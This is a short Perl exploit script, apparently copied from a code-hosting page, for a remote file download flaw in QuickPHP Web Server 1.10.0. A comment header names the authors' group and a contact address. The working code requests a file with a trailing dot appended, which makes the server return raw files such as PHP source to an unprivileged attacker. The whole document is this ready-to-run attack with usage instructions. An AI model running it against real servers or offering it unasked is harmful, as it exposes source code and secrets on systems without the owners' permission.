53 lines
No EOL
1.9 KiB
Perl
Executable file
53 lines
No EOL
1.9 KiB
Perl
Executable file
# _ ____ __ __ ___
|
|
# (_)____ _ __/ __ \/ /_____ ____/ / _/_/ |
|
|
# / // __ \ | / / / / / //_/ _ \/ __ / / / / /
|
|
# / // / / / |/ / /_/ / ,< / __/ /_/ / / / / /
|
|
# /_//_/ /_/|___/\____/_/|_|\___/\__,_/ / /_/_/
|
|
# Live by the byte |_/_/
|
|
#
|
|
# Members:
|
|
#
|
|
# Pr0T3cT10n
|
|
# -=M.o.B.=-
|
|
# TheLeader
|
|
# Sro
|
|
# Debug
|
|
#
|
|
# Contact: inv0ked.israel@gmail.com
|
|
#
|
|
# -----------------------------------
|
|
# QuickPHP Web Server is vulnerable for a Remote File Download attcak, the following code will exploit the bug.
|
|
# The vulnerability allows an unprivileged attacker to download files whom he has no permissions to.
|
|
# -----------------------------------
|
|
# Vulnerability Title: QuickPHP Web Server 1.10.0 Remote File Download Exploit
|
|
# Date: 30/12/2010
|
|
# Author: Pr0T3cT10n
|
|
# Software Link: http://www.zachsaw.co.cc/downloads/quickphp_webserver.zip
|
|
# Affected Version: 1.10.0
|
|
# Tested on Windows XP Hebrew, Service Pack 3
|
|
# ISRAEL, NULLBYTE.ORG.IL
|
|
###
|
|
|
|
#!/usr/bin/perl
|
|
use LWP::Simple;
|
|
|
|
if (@ARGV < 3) {
|
|
print("\r\n");
|
|
print("QuickPHP Web Server 1.10.0 Remote File Download Exploit\r\n");
|
|
print("Discovered & Exploited by Pr0T3cT10n\r\n");
|
|
print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n");
|
|
print("Usage: " .$0. " <host> <port> <file>\r\n");
|
|
print("HOST - An host using QuickPHP Web Server\r\n");
|
|
print("PORT - Port number\r\n");
|
|
print("FILE - The file you want to get\r\n");
|
|
print("Example: " .$0. " hostingserver.com 80 index.php\r\n\r\n");
|
|
exit(1);
|
|
} else {
|
|
print("QuickPHP Web Server 1.10.0 Remote File Download Exploit\r\n");
|
|
print("Discovered & Exploited by Pr0T3cT10n\r\n");
|
|
print("-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-\r\n\r\n");
|
|
($host, $port, $file) = @ARGV;
|
|
$content = get("http://" .$host. ":" .$port. "/" .$file. ".");
|
|
print("File Content:\r\n\r\n");
|
|
print($content. "\r\n");
|
|
} |